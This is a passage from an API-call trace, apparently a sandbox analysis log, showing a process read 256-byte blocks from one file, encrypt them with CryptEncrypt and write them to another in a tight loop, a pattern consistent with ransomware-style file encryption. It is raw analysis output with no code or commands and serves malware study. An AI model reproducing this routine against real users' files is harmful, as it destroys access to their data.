returned 1 [0151.286] GetLastError () returned 0x0 [0151.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.286] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.286] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.286] GetLastError () returned 0x0 [0151.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.286] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.286] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.286] GetLastError () returned 0x0 [0151.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.286] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.286] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.286] GetLastError () returned 0x0 [0151.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.286] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.286] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.286] GetLastError () returned 0x0 [0151.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.286] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.286] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.286] GetLastError () returned 0x0 [0151.286] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.286] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.287] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.287] GetLastError () returned 0x0 [0151.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.287] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.287] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.287] GetLastError () returned 0x0 [0151.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.287] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.287] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.287] GetLastError () returned 0x0 [0151.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.287] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.287] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.287] GetLastError () returned 0x0 [0151.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.287] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.287] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.287] GetLastError () returned 0x0 [0151.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.287] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.287] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.287] GetLastError () returned 0x0 [0151.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.287] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.288] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.288] GetLastError () returned 0x0 [0151.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.288] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.288] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.288] GetLastError () returned 0x0 [0151.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.288] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.288] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.288] GetLastError () returned 0x0 [0151.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.288] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.288] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.288] GetLastError () returned 0x0 [0151.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.288] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.288] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.288] GetLastError () returned 0x0 [0151.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.288] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.288] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.288] GetLastError () returned 0x0 [0151.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.288] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.288] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.288] GetLastError () returned 0x0 [0151.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.289] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.289] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.289] GetLastError () returned 0x0 [0151.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.289] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.289] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.289] GetLastError () returned 0x0 [0151.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.289] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.289] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.289] GetLastError () returned 0x0 [0151.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.289] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.289] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.289] GetLastError () returned 0x0 [0151.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.289] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.289] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.289] GetLastError () returned 0x0 [0151.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.289] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.289] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.289] GetLastError () returned 0x0 [0151.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.289] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.290] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.290] GetLastError () returned 0x0 [0151.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.290] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.290] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.290] GetLastError () returned 0x0 [0151.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.290] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.290] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.290] GetLastError () returned 0x0 [0151.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.290] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.290] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.290] GetLastError () returned 0x0 [0151.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.290] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.290] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.290] GetLastError () returned 0x0 [0151.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.290] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.290] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.290] GetLastError () returned 0x0 [0151.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.290] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.291] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.291] GetLastError () returned 0x0 [0151.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.291] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.291] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.291] GetLastError () returned 0x0 [0151.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: 